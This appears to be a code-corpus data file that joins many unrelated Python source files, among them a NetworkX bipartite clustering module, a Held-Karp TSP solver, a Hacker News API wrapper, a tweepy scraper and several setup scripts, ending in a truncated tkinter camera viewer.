and `c_{uv}` is the pairwise clustering coefficient between nodes
`u` and `v`.
The mode selects the function for `c_{uv}` which can be:
`dot`:
.. math::
c_{uv}=\frac{|N(u)\cap N(v)|}{|N(u) \cup N(v)|}
`min`:
.. math::
c_{uv}=\frac{|N(u)\cap N(v)|}{min(|N(u)|,|N(v)|)}
`max`:
.. math::
c_{uv}=\frac{|N(u)\cap N(v)|}{max(|N(u)|,|N(v)|)}
Parameters
----------
G : graph
A bipartite graph
nodes : list or iterable (optional)
Compute bipartite clustering for these nodes. The default
is all nodes in G.
mode : string
The pariwise bipartite clustering method to be used in the computation.
It must be "dot", "max", or "min".
Returns
-------
clustering : dictionary
A dictionary keyed by node with the clustering coefficient value.
Examples
--------
>>> from networkx.algorithms import bipartite
>>> G = nx.path_graph(4) # path graphs are bipartite
>>> c = bipartite.clustering(G)
>>> c[0]
0.5
>>> c = bipartite.clustering(G,mode='min')
>>> c[0]
1.0
See Also
--------
robins_alexander_clustering
square_clustering
average_clustering
References
----------
.. [1] Latapy, Matthieu, Clémence Magnien, and Nathalie Del Vecchio (2008).
Basic notions for the analysis of large two-mode networks.
Social Networks 30(1), 31--48.
"""
if not nx.algorithms.bipartite.is_bipartite(G):
raise nx.NetworkXError("Graph is not bipartite")
try:
cc_func = modes[mode]
except KeyError:
raise nx.NetworkXError(
"Mode for bipartite clustering must be: dot, min or max")
if nodes is None:
nodes = G
ccs = {}
for v in nodes:
cc = 0.0
nbrs2 = set([u for nbr in G[v] for u in G[nbr]]) - set([v])
for u in nbrs2:
cc += cc_func(set(G[u]), set(G[v]))
if cc > 0.0: # len(nbrs2)>0
cc /= len(nbrs2)
ccs[v] = cc
return ccs
clustering = latapy_clustering
def average_clustering(G, nodes=None, mode='dot'):
r"""Compute the average bipartite clustering coefficient.
A clustering coefficient for the whole graph is the average,
.. math::
C = \frac{1}{n}\sum_{v \in G} c_v,
where `n` is the number of nodes in `G`.
Similar measures for the two bipartite sets can be defined [1]_
.. math::
C_X = \frac{1}{|X|}\sum_{v \in X} c_v,
where `X` is a bipartite set of `G`.
Parameters
----------
G : graph
a bipartite graph
nodes : list or iterable, optional
A container of nodes to use in computing the average.
The nodes should be either the entire graph (the default) or one of the
bipartite sets.
mode : string
The pariwise bipartite clustering method.
It must be "dot", "max", or "min"
Returns
-------
clustering : float
The average bipartite clustering for the given set of nodes or the
entire graph if no nodes are specified.
Examples
--------
>>> from networkx.algorithms import bipartite
>>> G=nx.star_graph(3) # star graphs are bipartite
>>> bipartite.average_clustering(G)
0.75
>>> X,Y=bipartite.sets(G)
>>> bipartite.average_clustering(G,X)
0.0
>>> bipartite.average_clustering(G,Y)
1.0
See Also
--------
clustering
Notes
-----
The container of nodes passed to this function must contain all of the nodes
in one of the bipartite sets ("top" or "bottom") in order to compute
the correct average bipartite clustering coefficients.
See :mod:`bipartite documentation <networkx.algorithms.bipartite>`
for further details on how bipartite graphs are handled in NetworkX.
References
----------
.. [1] Latapy, Matthieu, Clémence Magnien, and Nathalie Del Vecchio (2008).
Basic notions for the analysis of large two-mode networks.
Social Networks 30(1), 31--48.
"""
if nodes is None:
nodes = G
ccs = latapy_clustering(G, nodes=nodes, mode=mode)
return float(sum(ccs[v] for v in nodes)) / len(nodes)
def robins_alexander_clustering(G):
r"""Compute the bipartite clustering of G.
Robins and Alexander [1]_ defined bipartite clustering coefficient as
four times the number of four cycles `C_4` divided by the number of
three paths `L_3` in a bipartite graph:
.. math::
CC_4 = \frac{4 * C_4}{L_3}
Parameters
----------
G : graph
a bipartite graph
Returns
-------
clustering : float
The Robins and Alexander bipartite clustering for the input graph.
Examples
--------
>>> from networkx.algorithms import bipartite
>>> G = nx.davis_southern_women_graph()
>>> print(round(bipartite.robins_alexander_clustering(G), 3))
0.468
See Also
--------
latapy_clustering
square_clustering
References
----------
.. [1] Robins, G. and M. Alexander (2004). Small worlds among interlocking
directors: Network structure and distance in bipartite graphs.
Computational & Mathematical Organization Theory 10(1), 69–94.
"""
if G.order() < 4 or G.size() < 3:
return 0
L_3 = _threepaths(G)
if L_3 == 0:
return 0
C_4 = _four_cycles(G)
return (4. * C_4) / L_3
def _four_cycles(G):
cycles = 0
for v in G:
for u, w in itertools.combinations(G[v], 2):
cycles += len((set(G[u]) & set(G[w])) - set([v]))
return cycles / 4
def _threepaths(G):
paths = 0
for v in G:
for u in G[v]:
for w in set(G[u]) - set([v]):
paths += len(set(G[w]) - set([v, u]))
# Divide by two because we count each three path twice
# one for each possible starting point
return paths / 2
|
8,064 | 63cce356b792949b90b215e0a5826f7b33d2d375 | # System import
import os
# Docutils import
from docutils import nodes
from docutils.parsers.rst.directives.admonitions import BaseAdmonition
from docutils.statemachine import ViewList
# Add node
class link_to_block(nodes.Admonition, nodes.Element):
""" Node for inserting a link to button."""
pass
# Add directive
class LinkToBlock(BaseAdmonition):
""" Hidden technical block"""
node_class = link_to_block
has_content = False
required_arguments = 1
optional_arguments = 2
final_argument_whitespace = True
option_spec = {
"right-side": bool,
"label": str
}
def run(self):
# Construct an empty node
new_content = ViewList()
ref = u":ref:`{0} <{1}>`".format(
self.options.get("label", "Link To"),
"".join(self.arguments))
new_content.append(ref, source=self.content)
self.content = new_content
return super(LinkToBlock, self).run()
# Add html writer
def visit_ltb_html(self, node):
""" Visit link to block"""
# Generate the html div
position = node.get("right-side", True)
self.body.append("<div class='{0}'>".format(
"buttonNext" if position else "buttonPrevious"))
def depart_ltb_html(self, node):
""" Depart link to block"""
# Add close div
self.depart_admonition(node)
# Register new directive
def setup(app):
app.add_directive("link-to-block", LinkToBlock)
app.add_node(link_to_block, html=(visit_ltb_html, depart_ltb_html))
|
8,065 | 638842cda666100ce197437cb354f66de77eb328 | from distutils.core import setup
setup(
name="zuknuft",
version="0.1",
author="riotbib",
author_email="riotbib@github",
scripts=["zukunft.py"],
install_requires=[
'bottle',
],
)
|
8,066 | 0bbc8aa77436193ab47c0fe8cf0d7c6dffcfe097 | from marko.parser import Parser # type: ignore
from marko.block import Heading, Paragraph, CodeBlock, List # type: ignore
from marko.inline import CodeSpan # type: ignore
from langcreator.common import Generators, InputOutputGenerator, tag_regex, get_tags, builtin_generators
import collections
import re
def parse(content: str) -> Generators:
parser = Parser()
document = parser.parse(content)
tag_name = ""
last_output = None
generators: Generators = {}
for item in document.children:
if type(item) == Heading:
_check_previous_generator(generators, tag_name)
# TODO: test
last_output = None
tag_name = item.children[0].children
_check_tag_name(tag_name)
_check_defined_twice(generators, tag_name)
generators[tag_name] = {}
elif type(item) == Paragraph and type(item.children[0]) == CodeSpan:
current_generator = generators[tag_name]
if type(current_generator) == dict:
last_output = item.children[0].children.replace("<empty>", "")
current_generator[last_output] = []
else:
raise Exception(f"Mixing list and inputs/output in {tag_name}")
elif type(item) == CodeBlock:
current_generator = generators[tag_name]
if last_output is None:
# TODO: test
raise Exception(
f"Input example defined without output in {tag_name}")
elif type(current_generator) == dict:
inputs = item.children[0].children.strip().split("\n")
inputs = [x.replace("<empty>", "") for x in inputs]
current_generator[last_output] += inputs
_check_tags(current_generator, tag_name)
else:
raise Exception(f"Mixing list and inputs/output in {tag_name}")
elif type(item) == List:
generators[tag_name] = [
x.children[0].children[0].children for x in item.children
]
_check_previous_generator(generators, tag_name)
_check_all_used_tags(generators)
return generators
def _check_tags(generator: InputOutputGenerator, name: str):
for output, inputs in generator.items():
necessary_tags = dict(collections.Counter(get_tags(output)))
for index, input in enumerate(inputs):
input_tags = dict(collections.Counter(get_tags(input)))
for tag, count in necessary_tags.items():
tag = tag.replace("'", "")
if tag not in input_tags:
raise Exception(
f"missing {tag} in example {index + 1} of {name} `{output}`"
)
diff = count - input_tags[tag]
if diff > 0:
raise Exception(
f"missing {diff} {tag} in example {index + 1} of {name} `{output}`. "
+
f"Expected to find {count} {tag}, found {input_tags[tag]}."
)
def _check_tag_name(tag):
if not re.fullmatch(tag_regex, "#" + tag.strip()):
raise Exception("# %s is invalid, only letters and _ are allowed" %
(tag))
def _check_defined_twice(generators, tag):
if tag in generators:
raise Exception("# %s is being defined twice" % (tag))
def _check_previous_generator(generators, name):
if not name:
return
if type(generators[name]) == list:
return
if len(generators[name]) == 0:
raise Exception("output missing on # %s" % name)
for index, inputs in enumerate(generators[name].values()):
if len(inputs) == 0:
raise Exception(
f"input examples missing on # {name}, on example #{index}")
def _check_all_used_tags(generators):
available_tags = ["#" + x for x in builtin_generators
] + ["#" + x for x in generators.keys()]
for key, generator in generators.items():
if type(generator) == list:
for tag in generator:
if "#" + tag not in available_tags:
raise Exception(
"- %s is used in # %s but it's not defined anywhere. Defined tags are %s"
% (tag, key, ", ".join(available_tags)))
else:
for output in generator.keys():
tags = get_tags(output)
for tag in tags:
if tag not in available_tags:
raise Exception(
"%s is used in # %s but it's not defined anywhere. Defined tags are %s"
% (tag, key, ", ".join(available_tags)))
|
8,067 | a33abd253288140f8051aced1d0ed1e41b2fc786 | from flask import Blueprint
application_vue_demo = Blueprint('application_vue_demo', __name__)
from. import views
|
8,068 | 3c6ef57501e01da79f894b36726a93a3a5e0a8f6 | # RUSH HOUR
m = int(input('Enter number of males:'))
f = int(input('Enter number of females:'))
if m%20 == 0:
m2 = m//20
c = 20
else:
m2 = m//20+1
c = m%20
f2 = f - 10*m2
if f2 <= 0 or f2-(20-c) <=0:
print('Number of trains needed: '+str(m2))
else:
print('Number of trains needed: '+str(1+(f2-(20-c))//30+m2))
|
8,069 | c716f43dbe62f662c60653f09be946a27c3fff66 | import Adafruit_BBIO.GPIO as GPIO
from pydrs import SerialDRS
import time
import sys
sys.dont_write_bytecode = True
class SyncRecv:
def __init__(self):
self._comport = '/dev/ttyUSB0'
self._baudrate = '115200'
self._epwm_sync_pin = 'GPIO2_23' # Input in BBB perspective
self._sync_in_pin = 'GPIO2_25' # Input in BBB perspective
self._sync_out_pin = 'GPIO1_14' # Output in BBB perspective
self.setup_pins()
def setup_pins(self):
GPIO.setup(self._epwm_sync_pin, GPIO.IN)
GPIO.setup(self._sync_in_pin, GPIO.IN)
GPIO.setup(self._sync_out_pin, GPIO.OUT)
def do_syncrecv_test(self):
drs = SerialDRS()
conn = drs.Connect(self._comport, self._baudrate)
if not conn:
print("Erro conexao serial")
return False
print("Iniciando teste dos receptores de fibra - sync")
print('Desliga transmissor sync')
GPIO.output(self._sync_out_pin, GPIO.HIGH) # Desliga transmissor
print('Le receptor sync (Esperado = 1)')
sts_sync_in = GPIO.input(self._sync_in_pin)
print('status: ' + str(sts_sync_in))
if sts_sync_in:
print('Liga transmissor sync')
GPIO.output(self._sync_out_pin, GPIO.LOW)
print('Le receptor sync (Esperado = 0)')
sts_sync_in = GPIO.input(self._sync_in_pin)
print('status: ' + str(sts_sync_in))
if not sts_sync_in:
print('DRS desligando todos os transmissores')
drs.ClearPof()
print('Lendo EPWM sync (Esperado = 1)')
sts_epwm_sync = GPIO.input(self._epwm_sync_pin)
print('status: ' + str(sts_epwm_sync))
if sts_epwm_sync:
print('DRS ligando todos os transmissores')
drs.SetPof()
print('Lendo EPWM sync (Esperado = 0)')
sts_epwm_sync = GPIO.input(self._epwm_sync_pin)
print('status: ' + str(sts_epwm_sync))
if not sts_epwm_sync:
drs.Disconnect()
return True
print("Falha receptores sync")
drs.Disconnect()
return False
|
8,070 | 3e8fa71c4e23348c6f00fe97729b5717bb6245a1 | '''
held-karp.py
Implementation of the Bellman-Held-Karp Algorithm to exactly solve TSPs,
requiring no external dependencies.
Includes a purely recursive implementation, as well as both top-down and
bottom-up dynamic programming approaches.
'''
import sys
def held_karp_recursive(distance_matrix):
'''
Solution to TSP using the Bellman-Held-Karp Algorithm
Given the adjacency matrix to a corresponding tsp problem, find the
minimum cost Hamiltonian cycle through the graph, as well as the
corresponding path
'''
d = distance_matrix
n = len(d)
def f(i, visited, path_so_far):
'''
Let f(i, visited, path_so_far) be the path of minimum distance from
city i to city 0, that passes through all remaining unvisited cities in
`visited`, where visited is a bitmask such that the bit in the jth
position being 1 represents city j having been visited, and bit j
being 0 represents city j having not been visited, and `path_so_far` is
the current path of minimum distance from city 0 up to city i.
Then the solution we want is f(0, 0, []), and the following recursive
relation holds:
f(i, visited) = min_{j in unvisited} ( d(i,j) + f(j, visited | (1<<j)) )
NOTE: Must be careful not to mutate
'''
# Base case: check if all cities have been visited
if visited == (1 << n) - 1:
# we have visited all cities, return to 0
return d[i][0], path_so_far + [0,]
min_dist = sys.maxint
# visit all unvisited cities
for j in xrange(n):
if not (1 << j) & visited:
dist_from_j, path_with_j = \
f(j, visited | (1 << j), path_so_far + [j,])
# Distance with j
dist_with_j = d[i][j] + dist_from_j
if dist_with_j < min_dist:
min_dist = dist_with_j
min_path = path_with_j
return min_dist, min_path
return f(0, 0, [])
def held_karp_topdown(distance_matrix):
'''
Above algorithm, but making use of memoization to avoid recomputing
overlapping subproblems
'''
d = distance_matrix
n = len(d)
'''
We need a dp table that will store the minimum distances from city i
to city 0 that passes through all unvisitied cities in the bit mask.
There are n cities, and 2^n possible binary strings of length n, so our
table will have dimensions n x 2^n
With this approach, we use another table called 'child' that keeps track
of the child city of i for each combination of (i, visited), and we can
use this table to obtain the actual Hamiltonian cycle of minimum distance.
'''
dp = [[None for i in xrange(2**n)] for j in xrange(n)]
child = [[None for i in xrange(2**n)] for j in xrange(n)]
def f(i, visited):
'''
f is defined as in the purely recursive implementation above.
The only difference here is that we check if the value we are
looking for is already in the defined dp table, and we do not
keep track of the path as we go along, as looking up a solution
for any given value would require having stored the path for
that solution as well, which would be expensive.
As such, we use the `child` table to keep track of where we
came from.
'''
# Check the table
if dp[i][visited]:
return dp[i][visited]
# Base case: check if all cities have been visited
if visited == (1 << n) - 1:
# we have visited all cities, return to 0
dp[i][visited] = d[i][0]
child[i][visited] = 0
return d[i][0]
min_dist = sys.maxint
chosen_j = None
# visit all unvisited cities
for j in xrange(n):
if not (1 << j) & visited:
dist_with_j = d[i][j] + f(j, (1 << j) | visited)
if dist_with_j < min_dist:
min_dist = dist_with_j
chosen_j = j
dp[i][visited] = min_dist
child[i][visited] = chosen_j
return min_dist
# The value we are interested in
ans = f(0,1)
# Can optain the optimal path using the parent matrix
path = [0]
i, visited = 0, 1
next_ = child[i][visited]
while next_ is not None:
path.append(next_)
visited |= (1 << next_)
next_ = child[next_][visited]
return ans, path
def held_karp_bottomup(distance_matrix):
'''
In the bottom up implementation, we compute all possible solutions for the
values `i` and `visited` as in the implementations above, and then
simply look up the value for f(0,0).
With this approach, we use the dp table, the original `distance_matrix`
and knowledge of the optimal cost to work backwards in determing what
the optimal path was.
'''
d = distance_matrix
n = len(d)
dp = [[None for i in xrange(2**n)] for j in xrange(n)]
# Base case:
# Distance from any city i back to 0 after having visited all cities
for i in xrange(n):
dp[i][(1<<n)-1] = d[i][0]
# Fill in all values of the dp table, excluding the values from the
# base case we've already inserted
# Note we started with having visited all cities except for 0
# and work backwards from there
for visited in reversed(xrange((1<<n)-1)):
for i in xrange(n):
min_dist = sys.maxint
for j in xrange(n):
if not (1 << j) & visited:
dist_j = d[i][j] + dp[j][visited | (1 << j)]
if dist_j < min_dist:
min_dist = dist_j
dp[i][visited] = min_dist
ans = dp[0][1]
# We can also optain the optimal path working backwards using
# the table and the knowledge of the cost of the optimal path
path = [0]
i, visited = 0, 1
cost_from_i = dp[i][visited]
while visited != (1 << n)-1:
for j in xrange(n):
if not visited & (1 << j):
cost_from_j = dp[j][visited | (1 << j)]
# require a tolerance for real valued distances
if abs((cost_from_i - cost_from_j) - d[i][j]) < 0.001:
# j was the city selected in the opt solution
path.append(j)
i, visited = j, visited | (1 << j)
cost_from_i = cost_from_j
break
# We have visited all cities, so return to 0
path.append(0)
return ans, path
class Vertex:
''' Simple implementation of a point in Euclidean space '''
def __init__(self, x, y):
self.x = float(x)
self.y = float(y)
def distance(v1, v2):
''' Euclidean distance between two `Vertex` instances '''
return ((v1.x - v2.x)**2 + (v1.y - v2.y)**2)**0.5
def adjacency_matrix(graph):
'''
Construct the corresponding adjacency matrix from a list of verticies in a
graph, assumed to be a complete graph.
'''
m = [[None for v in graph] for v in graph]
for i in xrange(len(m)):
for j in xrange(len(m[i])):
m[i][j] = distance(graph[i], graph[j])
return m
def main():
## Test cases
# g1: (16.0, [0, 2, 1, 3, 0])
g1 = [Vertex(0, 0), Vertex(4, 4), Vertex(4, 0), Vertex(0, 4)]
m1 = adjacency_matrix(g1)
for solver in held_karp_recursive, held_karp_topdown, held_karp_bottomup:
cost, path = solver(m1)
assert cost == 16.0
assert path == [0, 2, 1, 3, 0]
# g2: (15.773387165490545, [0, 3, 1, 2, 4, 0])
g2 = [Vertex(0, 0), Vertex(4, 4), Vertex(0, 3), Vertex(4, 0), Vertex(1, 2)]
m2 = adjacency_matrix(g2)
for solver in held_karp_recursive, held_karp_topdown, held_karp_bottomup:
cost, path = solver(m2)
assert abs(cost - 15.7733871) < 0.001
assert path == [0, 3, 1, 2, 4, 0]
if __name__ == '__main__':
main()
|
8,071 | 9d4559a363c4fd6f9a22dc493a7aaa0a22386c21 | import pandas as pd
from pymongo import MongoClient
import numpy as np
mongo_client = MongoClient('localhost', 27018)
mongo_db = mongo_client['ProjetoIN242']
mongo_collection = mongo_db['contadorpessoas']
query = mongo_collection.find({})
df = pd.DataFrame.from_records(query)
df_filtro = df[['Entrada','Dia', 'Quantidade de pessoas']] ##seleção de colunas
df_filtro.groupby('Dia')['Quantidade de pessoas'].mean().plot(x='Dia', y= 'Quantidade de pessoas')
|
8,072 | 5cd573f2b7f91a8b20e96deb1004c0ef7fc62398 | from funct import read_excel
import requests
import unittest
import HTMLTestReportCN
class v2exapi(unittest.TestCase):
def test_node_api(self):
url = "https://www.v2ex.com/api/nodes/show.json"
#querystring = {"name":"php"}
a=read_excel("xx.xlsx",0,0)
for node_name in a:
#for node_name in ['php',"python","qna"]:
response = requests.request("GET", url, params={"name":node_name}).json()
self.assertEqual(response['name'],node_name)
print(response)
def test_nade_type(self):
url = "https://www.apiopen.top/novelSearchApi"
querystring = {"name": "%E7%9B%98%E9%BE%99"}
headers = {
'Cache-Control': "no-cache",
'Postman-Token': "b249737d-aa24-4592-adf1-d19114f3f567"
}
response = requests.request("GET", url, headers=headers, params=querystring)
print(response.text)
if __name__ == '__main__':
#unittest.main()
suiteTest = unittest.TestSuite()
suiteTest.addTest(unittest.makeSuite(v2exapi))
filepath = '' + 'report.html'
# filepath='C:\\'+now+'.html'
fp = open(filepath, 'wb')
# 定义测试报告的标题与描述
runner = HTMLTestReportCN.HTMLTestRunner(stream=fp, title=u'自动化测试报告', description=u'测试报告')
runner.run(suiteTest)
fp.close()
#print(type(list1)) |
8,073 | e14c7eb11c06d6de5c2f9f8adfb8b742fcb432e1 | #!/usr/bin/env python
"""
haxor
Unofficial Python wrapper for official Hacker News API
@author avinash sajjanshetty
@email hi@avi.im
"""
from __future__ import absolute_import
from __future__ import unicode_literals
import datetime
import json
import sys
import requests
from .settings import supported_api_versions
__all__ = [
'User',
'Item',
'HackerNews',
'InvalidAPIVersion',
'InvalidItemID',
'InvalidUserID']
class InvalidItemID(Exception):
pass
class InvalidUserID(Exception):
pass
class InvalidAPIVersion(Exception):
pass
class HTTPError(Exception):
pass
class HackerNews(object):
def __init__(self, version='v0'):
"""
Args:
version (string): specifies Hacker News API version. Default is `v0`.
Raises:
InvalidAPIVersion: If Hacker News version is not supported.
"""
try:
self.base_url = supported_api_versions[version]
except KeyError:
raise InvalidAPIVersion
def _get(self, url):
"""Internal method used for GET requests
Args:
url (string): URL to send GET.
Returns:
requests' response object
Raises:
HTTPError: If HTTP request failed.
"""
response = requests.get(url)
if response.status_code == requests.codes.ok:
return response
else:
raise HTTPError
def _get_page(self, page):
return self._get('{0}{1}.json'.format(self.base_url, page))
def _get_page_param(self, page, param):
return self._get('{0}{1}/{2}.json'.format(self.base_url, page, param))
def get_item(self, item_id):
"""Returns Hacker News `Item` object.
Args:
item_id (int or string): Unique item id of Hacker News story, comment etc.
Returns:
`Item` object representing Hacker News item.
Raises:
InvalidItemID: If corresponding Hacker News story does not exist.
"""
response = self._get_page_param('item', item_id).json()
if not response:
raise InvalidItemID
return Item(response)
def get_user(self, user_id):
"""Returns Hacker News `User` object.
Args:
user_id (string): unique user id of a Hacker News user.
Returns:
`User` object representing a user on Hacker News.
Raises:
InvalidUserID: If no such user exists on Hacker News.
"""
response = self._get_page_param('user', user_id).json()
if not response:
raise InvalidUserID
return User(response)
def top_stories(self, limit=None):
"""Returns list of item ids of current top stories
Args:
limit (int): specifies the number of stories to be returned.
Returns:
`list` object containing ids of top stories.
"""
return self._get_page('topstories').json()[:limit]
def new_stories(self, limit=None):
"""Returns list of item ids of current new stories
Args:
limit (int): specifies the number of stories to be returned.
Returns:
`list` object containing ids of new stories.
"""
return self._get_page('newstories').json()[:limit]
def ask_stories(self, limit=None):
"""Returns list of item ids of latest Ask HN stories
Args:
limit (int): specifies the number of stories to be returned.
Returns:
`list` object containing ids of Ask HN stories.
"""
return self._get_page('askstories').json()[:limit]
def show_stories(self, limit=None):
"""Returns list of item ids of latest Show HN stories
Args:
limit (int): specifies the number of stories to be returned.
Returns:
`list` object containing ids of Show HN stories.
"""
return self._get_page('showstories').json()[:limit]
def job_stories(self, limit=None):
"""Returns list of item ids of latest Job stories
Args:
limit (int): specifies the number of stories to be returned.
Returns:
`list` object containing ids of Job stories.
"""
return self._get_page('jobstories').json()[:limit]
def updates(self):
"""Returns list of item ids and user ids that have been
changed/updated recently.
Returns:
`dict` with two keys whose values are `list` objects
"""
return self._get_page('updates').json()
def get_max_item(self):
"""Returns list of item ids of current top stories
Args:
limit (int): specifies the number of stories to be returned.
Returns:
`int` if successful.
"""
return self._get_page('maxitem').json()
class Item(object):
"""
Represents stories, comments, jobs, Ask HNs and polls
"""
def __init__(self, data):
self.item_id = data.get('id')
self.deleted = data.get('deleted')
self.item_type = data.get('type')
self.by = data.get('by')
self.submission_time = datetime.datetime.fromtimestamp(
data.get(
'time',
0))
self.text = data.get('text')
self.dead = data.get('dead')
self.parent = data.get('parent')
self.kids = data.get('kids')
self.descendants = data.get('descendants')
self.url = data.get('url')
self.score = data.get('score')
self.title = data.get('title')
self.parts = data.get('parts')
self.raw = json.dumps(data)
def __repr__(self):
retval = '<hackernews.Item: {0} - {1}>'.format(
self.item_id, self.title)
if sys.version_info.major < 3:
return retval.encode('utf-8', errors='backslashreplace')
return retval
class User(object):
"""
Represents a hacker i.e. a user on Hacker News
"""
def __init__(self, data):
self.user_id = data.get('id')
self.delay = data.get('delay')
self.created = datetime.datetime.fromtimestamp(data.get('created', 0))
self.karma = data.get('karma')
self.about = data.get('about')
self.submitted = data.get('submitted')
self.raw = json.dumps(data)
def __repr__(self):
retval = '<hackernews.User: {0}>'.format(self.user_id)
if sys.version_info.major < 3:
return retval.encode('utf-8', errors='backslashreplace')
return retval
|
8,074 | 02230b44568808757fe45fd18d28881d9bc3e410 | #!/usr/bin/env python
# encoding: utf-8
import tweepy #https://github.com/tweepy/tweepy
import csv
import scraperwiki
import json
#Twitter API credentials - these need adding
consumer_key = ""
consumer_secret = ""
access_key = ""
access_secret = ""
def get_all_tweets(screen_name):
#Twitter only allows access to a users most recent 3240 tweets with this method
#authorize twitter, initialize tweepy
auth = tweepy.OAuthHandler(consumer_key, consumer_secret)
auth.set_access_token(access_key, access_secret)
api = tweepy.API(auth)
#Better to be api = tweepy.API(auth, parser=JSONParser())
#See http://stackoverflow.com/questions/14856526/parsing-twitter-json-object-in-python
#initialize a list to hold all the tweepy Tweets
alltweets = []
#make initial request for most recent tweets (200 is the maximum allowed count)
new_tweets = api.user_timeline(screen_name = screen_name,count=200)
#save most recent tweets
alltweets.extend(new_tweets)
#save the id of the oldest tweet less one
oldest = alltweets[-1].id - 1
print "oldest: ", oldest
print "alltweets[0]: ", alltweets[0]
#Converts first tweet to text
#see http://stackoverflow.com/questions/27900451/convert-tweepy-status-object-into-json
json_str = json.dumps(alltweets[0]._json)
#CONVERT TO LOOP TO DO SAME TO ALL TWEETS
record = {}
print "len(alltweets)", len(alltweets)
for tweet in alltweets:
print "type(tweet)", type(tweet)
json_str = json.dumps(tweet._json)
print "type(tweet) 2", type(json_str)
print "json_str:", json_str
#Split tweet on commas to create an array
tweetarray = json_str.split(', "')
#tweetid2 = json_str.split('/status/')[1].split('/')[0]
tweetid = json_str.split('"id": ')[1].split(',')[0]
tweettxt = json_str.split('"text": ')[1].split(', "is_quote_status"')[0]
tweetdate = json_str.split('"created_at": "')[2].split('", "')[0]
name = json_str.split('"name": "')[1].split('", "')[0]
screenname = json_str.split('"screen_name": "')[1].split('", "')[0]
tweeturl = "https://twitter.com/"+screenname+"/status/"+tweetid
record['tweetid'] = tweetid
record['tweettxt'] = tweettxt
record['tweetdate'] = tweetdate
record['name'] = name
record['screenname'] = screenname#
record['tweeturl'] = tweeturl
print "record: ", record
scraperwiki.sql.save(['tweetid'], record)
#keep grabbing tweets until there are no tweets left to grab
while len(new_tweets) > 0:
print "getting tweets before %s" % (oldest)
#all subsiquent requests use the max_id param to prevent duplicates
new_tweets = api.user_timeline(screen_name = screen_name,count=200,max_id=oldest)
#save most recent tweetss
alltweets.extend(new_tweets)
#update the id of the oldest tweet less one
oldest = alltweets[-1].id - 1
print "...%s tweets downloaded so far" % (len(alltweets))
#transform the tweepy tweets into a 2D array that will populate the csv
#outtweets = [[tweet.id_str, tweet.created_at, tweet.text.encode("utf-8")] for tweet in alltweets]
#need to convert to a dict before saving - could do it in the loop above rather than at end
for tweet in alltweets:
print "type(tweet)", type(tweet)
json_str = json.dumps(tweet._json)
print "type(tweet) 2", type(json_str)
print "json_str:", json_str
tweetarray = json_str.split(', "')
tweetid = json_str.split('"id": ')[1].split(',')[0]
tweettxt = json_str.split('"text": ')[1].split(', "is_quote_status"')[0]
tweetdate = json_str.split('"created_at": "')[2].split('", "')[0]
name = json_str.split('"name": "')[1].split('", "')[0]
screenname = json_str.split('"screen_name": "')[1].split('", "')[0]
tweeturl = "https://twitter.com/"+screenname+"/status/"+tweetid
record['tweetid'] = tweetid
record['tweettxt'] = tweettxt
record['tweetdate'] = tweetdate
record['name'] = name
record['screenname'] = screenname#
record['tweeturl'] = tweeturl
print "record: ", record
scraperwiki.sql.save(['tweetid'], record)
#Add names as strings to this list
accountslist = []
for account in accountslist:
if __name__ == '__main__':
#pass in the username of the account you want to download
get_all_tweets(account)
|
8,075 | c81889cf4d87933b562aa4618bc5185a8d213107 | #! /usr/bin/env python
import os
import re
from codecs import open
from setuptools import find_packages, setup
here = os.path.abspath(os.path.dirname(__file__))
def get_changelog():
with open(os.path.join(here, 'CHANGELOG'), encoding='utf-8') as f:
text = f.read()
header_matches = list(re.finditer('^=+$', text, re.MULTILINE))
text = text[:header_matches[5].start()] # until fifth header
lines = text.splitlines()[:-1] # all lines without fifth release number
return '=========\nChangelog\n=========\n\n' + '\n'.join(lines)
about = {}
with open(os.path.join(here, 'devpi_server', '__version__.py'), 'r', 'utf-8') as f:
exec(f.read(), about)
with open('README.rst', encoding='utf-8') as f:
README = f.read()
CHANGELOG = get_changelog()
requires = [
'py>=1.4.23',
'appdirs',
'devpi_common<4,>=3.3.0',
'itsdangerous>=0.24',
'execnet>=1.2',
'pyramid>=1.8',
'waitress>=1.0.1',
'repoze.lru>=0.6',
'passlib[argon2]',
'pluggy>=0.3.0,<1.0',
'strictyaml',
]
extras_require = {}
setup(
name=about['__title__'],
description=about['__description__'],
keywords='pypi realtime cache server',
long_description="\n\n".join([README, CHANGELOG]),
url=about['__url__'],
version=about['__version__'],
maintainer=about['__maintainer__'],
maintainer_email=about['__maintainer_email__'],
packages=find_packages(),
include_package_data=True,
zip_safe=False,
license=about['__license__'],
classifiers=[
'Development Status :: 5 - Production/Stable',
'Environment :: Web Environment',
'Intended Audience :: Developers',
'Intended Audience :: System Administrators',
'License :: OSI Approved :: MIT License',
'Programming Language :: Python',
'Topic :: Internet :: WWW/HTTP',
'Topic :: Internet :: WWW/HTTP :: WSGI :: Application',
'Programming Language :: Python :: Implementation :: PyPy',
'Programming Language :: Python :: 2.7',
'Programming Language :: Python :: 3.4',
'Programming Language :: Python :: 3.5',
'Programming Language :: Python :: 3.6',
],
install_requires=requires,
extras_require=extras_require,
entry_points={
'console_scripts': [
'devpi-server = devpi_server.main:main' ],
'devpi_server': [
'devpi-server-auth-basic = devpi_server.auth_basic',
'devpi-server-auth-devpi = devpi_server.auth_devpi',
'devpi-server-sqlite = devpi_server.keyfs_sqlite',
'devpi-server-sqlite-fs = devpi_server.keyfs_sqlite_fs' ],
'devpi_web': [
'devpi-server-status = devpi_server.views'],
'pytest11': [
'pytest_devpi_server = pytest_devpi_server' ],
},
)
|
8,076 | e4ff6d689a7da5b16786fd59d6a4707b9b6e3e7d | import os
error_msg = '''The default transformer cannot handle slashes (subdirectories);
try another transformer in vlermv.transformers.'''
def to_path(key):
if isinstance(key, tuple):
if len(key) == 1:
key = key[0]
else:
raise ValueError(error_msg)
if '/' in key or '\\' in key or os.path.sep in key:
raise ValueError(error_msg)
return (key,)
def from_path(path):
if len(path) != 1:
raise ValueError(error_msg)
return path[0]
|
8,077 | be63e8e6e98c9afed66cae033a7f41f1be1561a8 | #!/usr/bin/python3
import tkinter
from PIL import Image, ImageTk
import requests
from io import BytesIO
from threading import Timer
rootWindow = tkinter.Tk()
# the following makes the program full-screen
RWidth = rootWindow.winfo_screenwidth()
RHeight = rootWindow.winfo_screenheight()
#
rootWindow.overrideredirect(True) # without a close option
rootWindow.geometry(("%dx%d")%(RWidth,RHeight))
cameraURL01="http://209.251.247.251:82/cgi-bin/camera?resolution=640&amp;quality=1&amp;Language=0&amp;1507301122"
cameraURL02="http://108.209.209.13/webcapture.jpg?command=snap&channel=1?1507300788"
